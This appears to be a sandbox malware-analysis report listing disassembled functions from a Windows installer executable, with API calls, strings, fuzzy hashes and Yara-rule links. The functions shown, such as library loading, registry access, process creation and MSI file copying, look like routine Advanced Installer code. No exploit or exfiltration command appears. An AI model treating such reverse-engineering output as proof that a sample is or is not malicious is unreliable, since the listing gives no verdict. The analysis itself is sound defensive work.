LocalFree.KERNEL32(?,2F685009,00000000,?,73B74D40,?,00000000,01404418,000000FF), ref: 01367138
LoadLibraryW.KERNEL32(Advapi32.dll), ref: 01367242
GetLastError.KERNEL32 ref: 01367270
GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 01367286

Strings

ConvertStringSidToSidW, xrefs: 01367280
Advapi32.dll, xrefs: 0136723D

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLocal$AddressErrorLastLibraryLoadProc
String ID: Advapi32.dll$ConvertStringSidToSidW
API String ID: 765017759-1129428314
Opcode ID: c1f02ed1f8e7937b7f7780f9a06173ef8c1391c04aabcc00d5d418276846c389
Instruction ID: b19ebf85ed813b5c4f7efaf9115ee7a4788169307dd34df69260b5bccbda6b81
Opcode Fuzzy Hash: c1f02ed1f8e7937b7f7780f9a06173ef8c1391c04aabcc00d5d418276846c389
Instruction Fuzzy Hash: 05D18FB0D0020ADFEB20CF98C944B9EFBF9FF54728F548219E915A7284D775A944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0132D890, Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 339libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,?,2F685009,?,00000000,00000000,?), ref: 0132DCB3
GetProcAddress.KERNEL32(00000000), ref: 0132DCBA
__Init_thread_footer.LIBCMT ref: 0132DCCE

Strings

%hs:%ld, xrefs: 0132DAF4
SymFromAddr, xrefs: 0132DCA9
[0x%.8Ix] , xrefs: 0132DBF2
%hs(), xrefs: 0132DCEF
Dbghelp.dll, xrefs: 0132DCAE
-> , xrefs: 0132DD81

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressInit_thread_footerLibraryLoadProc
String ID: -> $%hs()$%hs:%ld$Dbghelp.dll$SymFromAddr$[0x%.8Ix]
API String ID: 1761978672-1541941317
Opcode ID: 664d091e43146e5b6262d3241f09ce2d3f3e6d8f54a712c5e71a290e87639798
Instruction ID: e4301f479f2ffd547164aee0759e3d21b17fb170504a038d795bf18c7c4b78e3
Opcode Fuzzy Hash: 664d091e43146e5b6262d3241f09ce2d3f3e6d8f54a712c5e71a290e87639798
Instruction Fuzzy Hash: 79E15E709102599FDB24DF68CC98BEEBBB4FF54308F104299E809A7690DB759B84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0132DB70, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,?,2F685009,?,00000000,00000000,?), ref: 0132DCB3
GetProcAddress.KERNEL32(00000000), ref: 0132DCBA
__Init_thread_footer.LIBCMT ref: 0132DCCE

Strings

-----, xrefs: 0132DD28
SymFromAddr, xrefs: 0132DCA9
[0x%.8Ix] , xrefs: 0132DBF2
%hs(), xrefs: 0132DCEF
Dbghelp.dll, xrefs: 0132DCAE
-> , xrefs: 0132DD81

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressInit_thread_footerLibraryLoadProc
String ID: -> $%hs()$-----$Dbghelp.dll$SymFromAddr$[0x%.8Ix]
API String ID: 1761978672-2116945222
Opcode ID: 19a31cc81c1b6ab62d4d9804b4dd3691869bbc3badc0d6b32c0c4dec6a36f970
Instruction ID: bf6fe918058a6bbf847659838da1f35654cf2e7f53ebd2ee4e16a594e93d6c07
Opcode Fuzzy Hash: 19a31cc81c1b6ab62d4d9804b4dd3691869bbc3badc0d6b32c0c4dec6a36f970
Instruction Fuzzy Hash: ED6170B0610249DFDB24EFA8C845BEE7BF8FF14708F50451EE909A7690E7B4A644CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01351CA0, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 121COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 01351CD6

Strings

HKCR, xrefs: 01351D5D
HKLM, xrefs: 01351D05
HKEY_LOCAL_MACHINE, xrefs: 01351D1D
HKCU, xrefs: 01351D35
HKEY_CLASSES_ROOT, xrefs: 01351D71
HKEY_CURRENT_CONFIG, xrefs: 01351D99
HKCC, xrefs: 01351D85
HKEY_CURRENT_USER, xrefs: 01351D49

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcschr
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKLM
API String ID: 2691759472-1956487666
Opcode ID: 35868779890b904515d1dba7b87d44c403971edc33402945ae0a7f52c4ac8c9d
Instruction ID: 2cd6fb138629a2408515e2cf8a0d50a101493bf21ef06718b08c5ee9449e7f50
Opcode Fuzzy Hash: 35868779890b904515d1dba7b87d44c403971edc33402945ae0a7f52c4ac8c9d
Instruction Fuzzy Hash: 8C41B971E506565BEB10AA59DC01F7EBBE8EB10A2AF14067EED14A3290EB719D10CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0129F7A0, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 359stringCOMMON

Download Yara Rule

APIs

lstrcmpW.KERNEL32(?,#32770), ref: 0129F8A1

Strings

#32770, xrefs: 0129F898

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmp
String ID: #32770
API String ID: 1534048567-463685578
Opcode ID: e56073a97d8f7ad69704f96e4b110faacc76ed316275b574621b2afa6a93af92
Instruction ID: a76be25939d49d33b93dfdc9227a101986df19cf85618942c905b80b6aae7a85
Opcode Fuzzy Hash: e56073a97d8f7ad69704f96e4b110faacc76ed316275b574621b2afa6a93af92
Instruction Fuzzy Hash: CDE19D71A1021AEFDF15CFA8C954BAEBFB5BF49310F148119E911EB290D7749944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013671B0, Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 266libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Advapi32.dll), ref: 01367242
GetLastError.KERNEL32 ref: 01367270
GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 01367286
GetLastError.KERNEL32 ref: 0136749A
GetLastError.KERNEL32 ref: 013674FF

Strings

S-1-1-0, xrefs: 01367ADA
S-1-5-18, xrefs: 01367AEA
.part, xrefs: 01367A31
Advapi32.dll, xrefs: 0136723D

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: .part$Advapi32.dll$S-1-1-0$S-1-5-18
API String ID: 1866314245-1250433651
Opcode ID: f8ce52f437d2ec7357059c0a72c595fbc4892f36f2d53e6f0cc01565db869f4e
Instruction ID: d414a6e852c3ed7309b9b2b714d2f7cd9041eed46eec701dc7ff53248852dc38
Opcode Fuzzy Hash: f8ce52f437d2ec7357059c0a72c595fbc4892f36f2d53e6f0cc01565db869f4e
Instruction Fuzzy Hash: 3BB19DB1C0024ADBDF10CF98C9447EEBBB9FF04318F648259DA15BB284E374AA55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013483D0, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 150libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDefaultLangID.KERNEL32 ref: 0134840E
GetUserDefaultLangID.KERNEL32 ref: 0134841B
LoadLibraryW.KERNEL32(kernel32.dll), ref: 0134842D
GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 01348441
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 01348456

Strings

kernel32.dll, xrefs: 01348424
GetSystemDefaultUILanguage, xrefs: 0134843B
GetUserDefaultUILanguage, xrefs: 01348450

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDefaultLangProc$LibraryLoadSystemUser
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll
API String ID: 667524283-3528650308
Opcode ID: e528f2c5fad1c5fafa080abc89897ec28ce338d9a0c27c00bde126a9d55e8c70
Instruction ID: d24c75a98d7f293a71914a1f0302651f89dc7ec702ec9cba7ea9b4b7eb1f85ed
Opcode Fuzzy Hash: e528f2c5fad1c5fafa080abc89897ec28ce338d9a0c27c00bde126a9d55e8c70
Instruction Fuzzy Hash: DD41E070A04301CFCB51EF68D4506BAB7E1AFD8358F91095EF98AD7251EB34E844CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0129D6C0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0147C7FC,2F685009,00000000,?,?,?,?,?,?,0129CF20,013DD67D,000000FF), ref: 0129D6FD
LoadCursorW.USER32(00000000,00007F00), ref: 0129D778
LoadCursorW.USER32(00000000,00007F00), ref: 0129D81E
LeaveCriticalSection.KERNEL32(0147C7FC), ref: 0129D873

Strings

WM_ATLGETHOST, xrefs: 0129D709
WM_ATLGETCONTROL, xrefs: 0129D714
AtlAxWin140, xrefs: 0129D72F, 0129D793
AtlAxWinLic140, xrefs: 0129D7DF, 0129D835

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalCursorLoadSection$EnterLeave
String ID: AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
API String ID: 3727441302-1940731034
Opcode ID: ec784e01dc598de687c2c9a8fa22271ab93d0ad767ea1afd273c3585f59cc4aa
Instruction ID: 4286432c1d002bc94d95ac56c2db71d33b33e365e8351557d8f3fce186f7e713
Opcode Fuzzy Hash: ec784e01dc598de687c2c9a8fa22271ab93d0ad767ea1afd273c3585f59cc4aa
Instruction Fuzzy Hash: 955135B5D1025A9FDB21CFA8D888BEEBFF8FF08714F50012AE504B7290D77455498BA0

Uniqueness

Uniqueness Score: -1.00%

Function 013B93CB, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,013B96C2,0147B490,?,00000000,?,?,0129F754,00000000,?,?,?,?,?), ref: 013B93DD
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,013B96C2,0147B490,?,00000000,?,?,0129F754,00000000), ref: 013B93F2
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 013B946E

Strings

AtlThunk_FreeData, xrefs: 013B9448
AtlThunk_DataToCode, xrefs: 013B9431
AtlThunk_AllocateData, xrefs: 013B9403
atlthunk.dll, xrefs: 013B93ED
AtlThunk_InitData, xrefs: 013B941A

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 92c25e937b9fd01bba843729adffb0abfbfdacc14115fa63da90237bcad9961d
Instruction ID: 21f20f216a180af13650cf655020d6aa23824e8d0a11481a177434c3482742be
Opcode Fuzzy Hash: 92c25e937b9fd01bba843729adffb0abfbfdacc14115fa63da90237bcad9961d
Instruction Fuzzy Hash: E301DBB0A4130877DA21DB299C86BD93F568B1354CF144065FF86BA67DF6AD8204C792

Uniqueness

Uniqueness Score: -1.00%

Function 01353980, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 190libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32.dll,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01353AEC
GetProcAddress.KERNEL32(00000000,FlashWindowEx), ref: 01353B24
GetProcAddress.KERNEL32(FlashWindow), ref: 01353B3A

Strings

FlashWindowEx, xrefs: 01353B1E
user32.dll, xrefs: 01353AE0
FlashWindow, xrefs: 01353B2F
Ph/, xrefs: 01353980

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: Ph/$FlashWindow$FlashWindowEx$user32.dll
API String ID: 2238633743-722787886
Opcode ID: bf8edd65b3d8f6253c81345b42756d0db9460d42e09640c69c870091d7663827
Instruction ID: 273ad10dbc5e4dc981581d3120fb7ec7d15730b74f9273ba8dbc4c55fb5c5da9
Opcode Fuzzy Hash: bf8edd65b3d8f6253c81345b42756d0db9460d42e09640c69c870091d7663827
Instruction Fuzzy Hash: AA51E171A002028FDB10DF6CC884BAABBF2FF84B58F64416ED8059B395DB719904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012A4CD0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 148fileCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 012A4DBF

Part of subcall function 013BBD10: EnterCriticalSection.KERNEL32(0147B82C,?,?,01298887,0147C45C,01413860), ref: 013BBD1A
Part of subcall function 013BBD10: LeaveCriticalSection.KERNEL32(0147B82C,?,01298887,0147C45C,01413860), ref: 013BBD4D
Part of subcall function 013BBD10: RtlWakeAllConditionVariable.NTDLL ref: 013BBDC4

CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?), ref: 012A4E13
CloseHandle.KERNEL32(00000000), ref: 012A4E62

Part of subcall function 013BBD5A: EnterCriticalSection.KERNEL32(0147B82C,?,?,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBD65
Part of subcall function 013BBD5A: LeaveCriticalSection.KERNEL32(0147B82C,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBDA2

WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,?), ref: 012A4EC6
CloseHandle.KERNEL32(00000000,?), ref: 012A4EEC

Strings

html, xrefs: 012A4DCC
aix, xrefs: 012A4DD1

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CloseEnterFileHandleLeave$ConditionCreateInit_thread_footerVariableWakeWrite
String ID: aix$html
API String ID: 2030708724-2369804267
Opcode ID: 6960e90d5b17fa41bc6656b4254360c854e1f800ff5b6bf1be1e6ac130b9ab39
Instruction ID: 19341dce6852a3b84dbd8d7f05c60b1e4c7dabc4799f3ad481290b020d1cb702
Opcode Fuzzy Hash: 6960e90d5b17fa41bc6656b4254360c854e1f800ff5b6bf1be1e6ac130b9ab39
Instruction Fuzzy Hash: 2351BFB0900249DFDB20DFA8D988B9EBFF4FF54729F14011DE501AB298D7B55A48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013B94D7, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,013B9681,00000000,?,?,0129EC44,?), ref: 013B94FB
HeapAlloc.KERNEL32(00000000,?,?,0129EC44,?), ref: 013B9502

Part of subcall function 013B95CD: IsProcessorFeaturePresent.KERNEL32(0000000C,013B94E9,00000000,?,013B9681,00000000,?,?,0129EC44,?), ref: 013B95CF

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,013B9681,00000000,?,?,0129EC44,?), ref: 013B9512
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,0129EC44,?), ref: 013B9539
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,0129EC44,?), ref: 013B954D
InterlockedPopEntrySList.KERNEL32(00000000,?,?,0129EC44,?), ref: 013B9560
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0129EC44,?), ref: 013B9573

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 1a886d2fe1215229c4400887c8743cd9736290533421f861faf704a4725e2f1f
Instruction ID: 7ac76eee5e7d238ae8cc8ac24c63a762cf5dfccf7a731ac90bcd6596312f0e4b
Opcode Fuzzy Hash: 1a886d2fe1215229c4400887c8743cd9736290533421f861faf704a4725e2f1f
Instruction Fuzzy Hash: 591198F2680611EBE63117A8ACC8FE73B5DEB8965DF050421FB45EA655EA60CC004BF0

Uniqueness

Uniqueness Score: -1.00%

Function 01335320, Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 408fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

CopyFileW.KERNEL32(?,?,00000000,00000000,00000000), ref: 013354F8

Strings

instname-target.msi, xrefs: 0133546D
ProductName, xrefs: 013355C7, 013355D9, 013355E3
instname-custom.mst, xrefs: 013354AB
AI_PRODUCTNAME_ARP, xrefs: 0133564F, 01335661, 0133566B
\\?\, xrefs: 013353D6

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer$CopyFileHeapProcess
String ID: AI_PRODUCTNAME_ARP$ProductName$\\?\$instname-custom.mst$instname-target.msi
API String ID: 2718715797-2776905159
Opcode ID: 8be92cd18a549284a9c1d17538df581f49095559aaf50aa979a169e85e9f8fe0
Instruction ID: ee02ba5600df0d18a19a04fa07af230b8deb1ff0bee9d2b1e0835a3659521ec3
Opcode Fuzzy Hash: 8be92cd18a549284a9c1d17538df581f49095559aaf50aa979a169e85e9f8fe0
Instruction Fuzzy Hash: 17E19230A0164ADFDB01DFADC844BAEBBB5AF55319F18C2A9E415DB291EB34D904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012A4F30, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 236registryCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,2F685009), ref: 012A4FC3
GetLastError.KERNEL32 ref: 012A4FEC
RegCloseKey.ADVAPI32(?,00000000,00000000,?,01420988,00000000,00000000,80000001,00000000,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 012A5148
RegCloseKey.ADVAPI32(?,00000000,00000000,?,01420988,00000000,01420988,00000000,00000000,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 012A5295

Strings

Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 012A4FB8
AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 012A5032, 012A5185

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$CreateErrorEventLast
String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
API String ID: 2907419958-2079760225
Opcode ID: cb7571194e2bf4c8cfd1ce51bc3d89f4d25cdbc5cac4813551cdedbf341d2686
Instruction ID: c7174b939b7cdf59b2068818f0e90629f4a2708c556629eb60a3e03a6b1e9b9b
Opcode Fuzzy Hash: cb7571194e2bf4c8cfd1ce51bc3d89f4d25cdbc5cac4813551cdedbf341d2686
Instruction Fuzzy Hash: B2B13CB0D11249DFEF10DFA8C944BEEBBF4AF14308F608199D455B7291DBB46A48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0132D540, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 171libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 013BBD5A: EnterCriticalSection.KERNEL32(0147B82C,?,?,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBD65
Part of subcall function 013BBD5A: LeaveCriticalSection.KERNEL32(0147B82C,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBDA2

LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 0132D5B4
GetProcAddress.KERNEL32(00000000), ref: 0132D5BB
__Init_thread_footer.LIBCMT ref: 0132D5D2

Part of subcall function 013BBD10: EnterCriticalSection.KERNEL32(0147B82C,?,?,01298887,0147C45C,01413860), ref: 013BBD1A
Part of subcall function 013BBD10: LeaveCriticalSection.KERNEL32(0147B82C,?,01298887,0147C45C,01413860), ref: 013BBD4D
Part of subcall function 013BBD10: RtlWakeAllConditionVariable.NTDLL ref: 013BBDC4

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0132D66C

Strings

SymFromAddr, xrefs: 0132D5AA
Dbghelp.dll, xrefs: 0132D5AF

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionFileInit_thread_footerLibraryLoadModuleNameProcVariableWake
String ID: Dbghelp.dll$SymFromAddr
API String ID: 2452955095-642441706
Opcode ID: 224ee58d4818670f59cb2a2f52d881b3f89d0aecd5bf455106de70070eef3b05
Instruction ID: 5e4d457e5ee4c8c2eeae2f73a260c59db00db51e41ec13a5ed44b1c1bc3b331d
Opcode Fuzzy Hash: 224ee58d4818670f59cb2a2f52d881b3f89d0aecd5bf455106de70070eef3b05
Instruction Fuzzy Hash: A971AD70900269CFEB35DF68DC45BEDBBB4EB05318F1082E9D64AA7290E7745A84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01352670, Relevance: 10.6, APIs: 7, Instructions: 108processsynchronizationCOMMON

Download Yara Rule

APIs

Wow64DisableWow64FsRedirection.KERNEL32(00000000,2F685009,?,?), ref: 013526B7
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,2F685009,014002BD), ref: 0135272F
GetLastError.KERNEL32 ref: 01352740
WaitForSingleObject.KERNEL32(014002BD,000000FF), ref: 0135275C
GetExitCodeProcess.KERNEL32 ref: 0135276D
CloseHandle.KERNEL32(014002BD), ref: 01352777
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 01352792

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Wow64$ProcessRedirection$CloseCodeCreateDisableErrorExitHandleLastObjectRevertSingleWait
String ID:
API String ID: 1153077990-0
Opcode ID: 93019d16373d7169cf3762669894cdd03c96ddcf6d671ab08d5bdead10a37d86
Instruction ID: 603a62038a20c2c85e224e1f4f9d66e4a10b7dd561fe328e0aedf05def1b62a0
Opcode Fuzzy Hash: 93019d16373d7169cf3762669894cdd03c96ddcf6d671ab08d5bdead10a37d86
Instruction Fuzzy Hash: 8B418E71E00789EBDB21CFA5CD04BEEBBF8AF4A714F144259E824AB194D7749A40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012F3280, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,2F685009,?,?,?,?,?,013DBF00,000000FF,?,01325FEC,?,?,000000FF), ref: 012F32C3
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 012F32EC
RegOpenKeyExW.ADVAPI32(?,2F685009,00000000,?,00000000,2F685009,?,?,?,?,?,013DBF00,000000FF,?,01325FEC,?), ref: 012F3325
RegCloseKey.ADVAPI32(00000000,?,?,?,013DBF00,000000FF,?,01325FEC,?,?,000000FF), ref: 012F3338

Strings

Advapi32.dll, xrefs: 012F32BE
RegOpenKeyTransactedW, xrefs: 012F32E6

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
